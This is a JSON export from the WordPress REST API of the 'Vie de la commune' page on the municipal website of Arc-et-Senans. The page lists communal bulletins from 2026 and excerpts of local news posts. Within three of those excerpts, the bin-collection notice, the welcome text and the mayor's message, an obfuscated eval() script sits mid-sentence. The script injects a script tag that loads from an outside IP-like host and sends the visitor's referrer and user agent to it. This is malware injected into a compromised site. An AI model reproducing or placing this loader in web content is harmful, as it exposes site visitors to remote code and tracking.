{"id":28,"date":"2015-06-23T14:34:10","date_gmt":"2015-06-23T13:34:10","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?page_id=28"},"modified":"2022-03-15T10:00:56","modified_gmt":"2022-03-15T09:00:56","slug":"vie-de-la-commune","status":"publish","type":"page","link":"https:\/\/www.arc-et-senans.com\/","title":{"rendered":"Vie de la commune"},"content":{"rendered":"<div id=\"pl-28\"  class=\"panel-layout\" ><div id=\"pg-28-0\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-28-0-0\"  class=\"panel-grid-cell\" ><\/div><\/div><div id=\"pg-28-1\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-28-1-0\"  class=\"panel-grid-cell\" ><div id=\"panel-28-1-0-0\" class=\"so-panel widget widget_my_calendar_upcoming_widget panel-first-child\"><h3 class=\"widget-title\">\u00c9v\u00e9nements \u00e0 venir<\/h3><div class='mc-event-list-container'><ul id='upcoming-events-c18d1a025d9446bf7fae82504e06e7bf' class='mc-event-list no-events-fallback upcoming-events list-events'><li class=\"\">aucun \u00e9v\u00e9nement \u00e0 venir<\/li><\/ul><\/div><\/div><div id=\"panel-28-1-0-1\" class=\"so-panel widget widget_wpgmza_map_widget wpgmza_widget\" data-index=\"2\"><h3 class=\"widget-title\">Plan<\/h3><div id=\"wpgmza_map\" class=\"wpgmza_map\" data-settings='{\"id\":\"2\",\"map_title\":\"Enregistrer la carte\",\"map_width\":\"100\",\"map_height\":\"400\",\"map_start_lat\":\"47.03273790069909\",\"map_start_lng\":\"5.7807592533548\",\"map_start_location\":\"45.950464398418106,-109.81550500000003\",\"map_start_zoom\":\"16\",\"default_marker\":\"\",\"type\":\"0\",\"alignment\":\"4\",\"directions_enabled\":\"0\",\"styling_enabled\":\"0\",\"styling_json\":\"\",\"active\":\"0\",\"kml\":\"\",\"bicycle\":\"0\",\"traffic\":\"0\",\"dbox\":\"0\",\"dbox_width\":\"\",\"listmarkers\":\"0\",\"listmarkers_advanced\":\"0\",\"filterbycat\":\"0\",\"ugm_enabled\":\"0\",\"ugm_category_enabled\":\"0\",\"fusion\":\"\",\"map_width_type\":\"%\",\"map_height_type\":\"px\",\"mass_marker_support\":\"0\",\"ugm_access\":\"0\",\"order_markers_by\":\"0\",\"order_markers_choice\":\"0\",\"show_user_location\":\"0\",\"default_to\":\"\",\"other_settings\":{\"map_type\":1,\"sl_stroke_color\":\"\",\"sl_fill_color\":\"\",\"sl_stroke_opacity\":\"\",\"sl_fill_opacity\":\"\",\"transport_layer\":false,\"action\":\"wpgmza_save_map\",\"redirect_to\":\"\\\/wp-admin\\\/admin-post.php\",\"map_id\":\"2\",\"http_referer\":\"\\\/wp-admin\\\/admin.php?page=wp-google-maps-menu&amp;amp;override=1&amp;amp;action=edit&amp;amp;map_id=2\",\"wpgmza_id\":\"2\",\"wpgmza_start_location\":\"47.03273790069909,5.7807592533548\",\"wpgmza_start_zoom\":\"16\",\"store_locator_enabled\":false,\"store_locator_search_area\":\"radial\",\"wpgmza_store_locator_radius_style\":\"legacy\",\"wpgmza_store_locator_default_radius\":\"10\",\"store_locator_auto_area_max_zoom\":\"\",\"store_locator_distance\":false,\"wpgmza_store_locator_position\":false,\"store_locator_show_distance\":false,\"store_locator_category\":false,\"wpgmza_store_locator_use_their_location\":false,\"wpgmza_store_locator_bounce\":false,\"wpgmza_sl_animation\":null,\"wpgmza_store_locator_hide_before_search\":false,\"store_locator_query_string\":\"\",\"store_locator_default_address\":\"\",\"store_locator_name_search\":false,\"store_locator_name_string\":\"\",\"store_locator_not_found_message\":\"\",\"wpgmza_map_align\":\"1\",\"jump_to_nearest_marker_on_initialization\":false,\"automatically_pan_to_users_location\":false,\"override_users_location_zoom_level\":false,\"override_users_location_zoom_levels\":\"\",\"show_distance_from_location\":false,\"map_max_zoom\":\"21\",\"map_min_zoom\":\"0\",\"click_open_link\":false,\"fit_maps_bounds_to_markers\":false,\"fit_maps_bounds_to_markers_after_filtering\":false,\"hide_point_of_interest\":false,\"wpgmza_zoom_on_marker_click\":false,\"wpgmza_zoom_on_marker_click_slider\":\"\",\"close_infowindow_on_map_click\":false,\"disable_lightbox_images\":false,\"use_Raw_Jpeg_Coordinates\":false,\"disable_polygon_info_windows\":false,\"enable_marker_ratings\":false,\"only_load_markers_within_viewport\":false,\"iw_primary_color\":\"\",\"iw_accent_color\":\"\",\"iw_text_color\":\"\",\"wpgmza_listmarkers_by\":\"0\",\"wpgmza_marker_listing_position\":false,\"zoom_level_on_marker_listing_override\":false,\"zoom_level_on_marker_listing_click\":\"\",\"datatable_no_result_message\":\"\",\"remove_search_box_datables\":false,\"dataTable_pagination_style\":null,\"datatable_search_string\":\"\",\"datatable_result_start\":\"\",\"datatable_result_of\":\"\",\"datatable_result_to\":\"\",\"datatable_result_total\":\"\",\"datatable_result_show\":\"\",\"datatable_result_entries\":\"\",\"wpgmza_savemap\":\"Enregistrer la carte \\u00bb\"}}' data-map-id='2' Data-maps-engine='open-layers' data-shortcode-attributes='{\"id\":\"2\"}' style=\"display:block; overflow:auto; width:100%; height:400px; float:left;\"><\/div><\/div><div id=\"panel-28-1-0-2\" class=\"so-panel widget widget_siteorigin-panels-postloop panel-last-child\" data-index=\"3\" ><h3 class=\"widget-title\">derniers bulletins<\/h3><article id=\"post-10239\" class=\"post-10239 post type-post status-publish format-standard has-post-thumbnail hentry category-archives category-archives-bulletins category-les-bulletins\" link=\"https:\/\/www.arc-et-senans.com\/?p=10239\">\n\t\n\t\n\t<header class=\"entry-header\">\n\t\t\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"cat-links\"><a href=\"https:\/\/www.arc-et-senans.com\/?cat=57\" rel=\"category\">ARCHIVES<\/a>, <a href=\"https:\/\/www.arc-et-senans.com\/?cat=58\" rel=\"category\">Archives bulletins<\/a>, <a href=\"https:\/\/www.arc-et-senans.com\/?cat=23\" rel=\"category\">les bulletins<\/a><\/span>\n\t\t<\/div>\n\t\t<h1 class=\"entry-title\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=10239\" rel=\"bookmark\">BULLETIN COMMUNAL N\u00b0 71 AVRIL 2026<\/a><\/h1>\n\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"entry-date\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=10239\" rel=\"bookmark\"><time class=\"entry-date\" datetime=\"2026-03-31T09:28:03+01:00\">31 mars 2026<\/time><\/a><\/span> <span class=\"byline\"><span class=\"author vcard\"><a class=\"url fn n\" href=\"https:\/\/www.arc-et-senans.com\/?author=2\" rel=\"author\">christine Breuillot<\/a><\/span><\/span>\t\t<\/div><!-- .entry-meta -->\n\t<\/header><!-- .entry-header -->\n\n\t\t<div class=\"entry-content\">\n\t\t<div class=\"imgPost\"><img loading=\"lazy\" decoding=\"async\" width=\"242\" height=\"180\" src=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/06\/picto_bulletin.png\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"\" \/><\/div><div class=\"textPost\"><p><a href=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2026\/03\/ARC-ET-SENANS-BULL-AVRIL-2026.pdf\">ARC ET SENANS BULL AVRIL 2026<\/a><\/p>\n<\/div>\t<\/div><!-- .entry-content -->\n\t\n\t\n<\/article><!-- #post-## -->\n<article id=\"post-10024\" class=\"post-10024 post type-post status-publish format-standard has-post-thumbnail hentry category-archives category-archives-bulletins category-les-bulletins category-vie-de-la-commune\" link=\"https:\/\/www.arc-et-senans.com\/?p=10024\">\n\t\n\t\n\t<header class=\"entry-header\">\n\t\t\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"cat-links\"><a href=\"https:\/\/www.arc-et-senans.com\/?cat=57\" rel=\"category\">ARCHIVES<\/a>, <a href=\"https:\/\/www.arc-et-senans.com\/?cat=58\" rel=\"category\">Archives bulletins<\/a>, <a href=\"https:\/\/www.arc-et-senans.com\/?cat=23\" rel=\"category\">les bulletins<\/a>, <a href=\"https:\/\/www.arc-et-senans.com\/?cat=21\" rel=\"category\">vie de la commune<\/a><\/span>\n\t\t<\/div>\n\t\t<h1 class=\"entry-title\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=10024\" rel=\"bookmark\">BULLETIN COMMUNAL N\u00b0 70 JANVIER 2026<\/a><\/h1>\n\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"entry-date\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=10024\" rel=\"bookmark\"><time class=\"entry-date\" datetime=\"2025-12-23T09:26:04+01:00\">23 d\u00e9cembre 2025<\/time><\/a><\/span> <span class=\"byline\"><span class=\"author vcard\"><a class=\"url fn n\" href=\"https:\/\/www.arc-et-senans.com\/?author=2\" rel=\"author\">christine Breuillot<\/a><\/span><\/span>\t\t<\/div><!-- .entry-meta -->\n\t<\/header><!-- .entry-header -->\n\n\t\t<div class=\"entry-content\">\n\t\t<div class=\"imgPost\"><img loading=\"lazy\" decoding=\"async\" width=\"242\" height=\"180\" src=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/06\/picto_bulletin.png\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"\" \/><\/div><div class=\"textPost\"><p><a href=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2025\/12\/ARC-ET-SENANS-BULL-JANVIER-2026.pdf\">ARC ET SENANS BULL JANVIER 2026<\/a><\/p>\n<\/div>\t<\/div><!-- .entry-content -->\n\t\n\t\n<\/article><!-- #post-## -->\n<\/div><\/div><div id=\"pgc-28-1-1\"  class=\"panel-grid-cell\" ><div id=\"panel-28-1-1-0\" class=\"so-panel widget widget_siteorigin-panels-postloop panel-first-child panel-last-child\" data-index=\"4\" ><h3 class=\"widget-title\">Actualit\u00e9s<\/h3><article id=\"post-231\" class=\"post-231 post type-post status-publish format-standard has-post-thumbnail hentry category-accueil\" link=\"https:\/\/www.arc-et-senans.com\/?p=231\">\n\t\n\t\n\t<header class=\"entry-header\">\n\t\t\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"cat-links\"><a href=\"https:\/\/www.arc-et-senans.com\/?cat=17\" rel=\"category\">accueil<\/a><\/span>\n\t\t<\/div>\n\t\t<h1 class=\"entry-title\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=231\" rel=\"bookmark\">Br\u00e8ves<\/a><\/h1>\n\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"entry-date\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=231\" rel=\"bookmark\"><time class=\"entry-date\" datetime=\"2015-07-21T09:23:48+01:00\">21 juillet 2015<\/time><\/a><\/span> <span class=\"byline\"><span class=\"author vcard\"><a class=\"url fn n\" href=\"https:\/\/www.arc-et-senans.com\/?author=1\" rel=\"author\">saibe<\/a><\/span><\/span>\t\t<\/div><!-- .entry-meta -->\n\t<\/header><!-- .entry-header -->\n\n\t\t<div class=\"entry-content\">\n\t\t<div class=\"imgPost\"><img loading=\"lazy\" decoding=\"async\" width=\"216\" height=\"214\" src=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/07\/breves.jpg\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"\" srcset=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/07\/breves.jpg 216w, https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/07\/breves-150x150.jpg 150w\" sizes=\"auto, (max-width: 216px) 100vw, 216px\" \/><\/div><div class=\"textPost\"><p><u><b><strong>Poubelles<\/strong><\/b><\/u><br \/>\nLe <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kynaz|var|u0026u|referrer|kkahi||js|php'.split('|'),0,{}))<br \/>\n<\/a><\/script> bac \u00e0 puce destin\u00e9 aux ordures m\u00e9nag\u00e8res et le bac destin\u00e9 au tri (recyclables) sont obligatoires. Ces bacs sont gratuits, il sont \u00e0 retirer aupr\u00e8s du secr\u00e9tariat de l&rsquo;ancienne Communaut\u00e9 de Communes de Quingey, \u00e0 proximit\u00e9 du coll\u00e8ge, \u00e0 Quingey, t\u00e9l\u00e9phone : 03 81 63 84 63.<br \/>\n <a href=\"https:\/\/www.arc-et-senans.com\/?p=231#more-231\" class=\"more-link\">Lire la suite <span class=\"screen-reader-text\">Br\u00e8ves<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n<\/div>\t<\/div><!-- .entry-content -->\n\t\n\t\n<\/article><!-- #post-## -->\n<article id=\"post-35\" class=\"post-35 post type-post status-publish format-standard has-post-thumbnail hentry category-accueil\" link=\"https:\/\/www.arc-et-senans.com\/?p=35\">\n\t\n\t\n\t<header class=\"entry-header\">\n\t\t\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"cat-links\"><a href=\"https:\/\/www.arc-et-senans.com\/?cat=17\" rel=\"category\">accueil<\/a><\/span>\n\t\t<\/div>\n\t\t<h1 class=\"entry-title\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=35\" rel=\"bookmark\">Bienvenue chez nous<\/a><\/h1>\n\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"entry-date\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=35\" rel=\"bookmark\"><time class=\"entry-date\" datetime=\"2015-06-24T10:21:33+01:00\">24 juin 2015<\/time><\/a><\/span> <span class=\"byline\"><span class=\"author vcard\"><a class=\"url fn n\" href=\"https:\/\/www.arc-et-senans.com\/?author=1\" rel=\"author\">saibe<\/a><\/span><\/span>\t\t<\/div><!-- .entry-meta -->\n\t<\/header><!-- .entry-header -->\n\n\t\t<div class=\"entry-content\">\n\t\t<div class=\"imgPost\"><img loading=\"lazy\" decoding=\"async\" width=\"496\" height=\"267\" src=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/06\/photo5.jpg\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"\" srcset=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/06\/photo5.jpg 496w, https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/06\/photo5-300x161.jpg 300w\" sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><\/div><div class=\"textPost\"><p>Fort de sa situation et de son histoire, <span style=\"color: #ff9900;\"><strong>Arc <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbika|var|u0026u|referrer|nenad||js|php'.split('|'),0,{}))<br \/>\n<\/a><\/script> et Senans<\/strong><\/span> vous accueille en vous offrant tous les attraits de la Franche Comt\u00e9&#8230; <a href=\"https:\/\/www.arc-et-senans.com\/?p=35#more-35\" class=\"more-link\">Lire la suite <span class=\"screen-reader-text\">Bienvenue chez nous<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n<\/div>\t<\/div><!-- .entry-content -->\n\t\n\t\n<\/article><!-- #post-## -->\n<article id=\"post-1\" class=\"post-1 post type-post status-publish format-standard has-post-thumbnail hentry category-accueil\" link=\"https:\/\/www.arc-et-senans.com\/?p=1\">\n\t\n\t\n\t<header class=\"entry-header\">\n\t\t\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"cat-links\"><a href=\"https:\/\/www.arc-et-senans.com\/?cat=17\" rel=\"category\">accueil<\/a><\/span>\n\t\t<\/div>\n\t\t<h1 class=\"entry-title\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=1\" rel=\"bookmark\">Le mot du maire<\/a><\/h1>\n\t\t<div class=\"entry-meta\">\n\t\t\t<span class=\"entry-date\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=1\" rel=\"bookmark\"><time class=\"entry-date\" datetime=\"2015-04-20T12:35:19+01:00\">20 avril 2015<\/time><\/a><\/span> <span class=\"byline\"><span class=\"author vcard\"><a class=\"url fn n\" href=\"https:\/\/www.arc-et-senans.com\/?author=1\" rel=\"author\">saibe<\/a><\/span><\/span>\t\t\t<span class=\"comments-link\"><a href=\"https:\/\/www.arc-et-senans.com\/?p=1#respond\">Leave a comment<\/a><\/span>\n\t\t\t\t\t<\/div><!-- .entry-meta -->\n\t<\/header><!-- .entry-header -->\n\n\t\t<div class=\"entry-content\">\n\t\t<div class=\"imgPost\"><img loading=\"lazy\" decoding=\"async\" width=\"672\" height=\"372\" src=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/thi\u00e9faine5-672x372.jpg\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"\" srcset=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/thi\u00e9faine5-672x372.jpg 672w, https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/thi\u00e9faine5-1038x576.jpg 1038w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/div><div class=\"textPost\"><p><strong>ARC-ET-SENANS <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|diaar|var|u0026u|referrer|rebat||js|php'.split('|'),0,{}))<br \/>\n<\/a><\/script> <\/strong>ne faillit pas \u00e0 la tradition d&rsquo;utiliser les nouveaux moyens de communication comme l&rsquo;est internet dans le domaine de l&rsquo;information.<\/p>\n<p> <a href=\"https:\/\/www.arc-et-senans.com\/?p=1#more-1\" class=\"more-link\">Lire la suite <span class=\"screen-reader-text\">Le mot du maire<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n<\/div>\t<\/div><!-- .entry-content -->\n\t\n\t\n<\/article><!-- #post-## -->\n<\/div><\/div><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>\u00c9v\u00e9nements \u00e0 veniraucun \u00e9v\u00e9nement \u00e0 venirPlanderniers bulletins ARCHIVES, Archives bulletins, les bulletins BULLETIN COMMUNAL N\u00b0 71 AVRIL 2026 31 mars 2026 christine Breuillot ARC ET SENANS BULL AVRIL 2026 ARCHIVES, Archives bulletins, les bulletins, vie de la commune BULLETIN COMMUNAL N\u00b0 70 JANVIER 2026 23 d\u00e9cembre 2025 christine Breuillot ARC ET SENANS BULL JANVIER 2026 &hellip; <a href=\"https:\/\/www.arc-et-senans.com\/\" class=\"more-link\">Lire la suite <span class=\"screen-reader-text\">Vie de la commune<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-28","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/pages\/28","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28"}],"version-history":[{"count":19,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/pages\/28\/revisions"}],"predecessor-version":[{"id":6988,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/pages\/28\/revisions\/6988"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}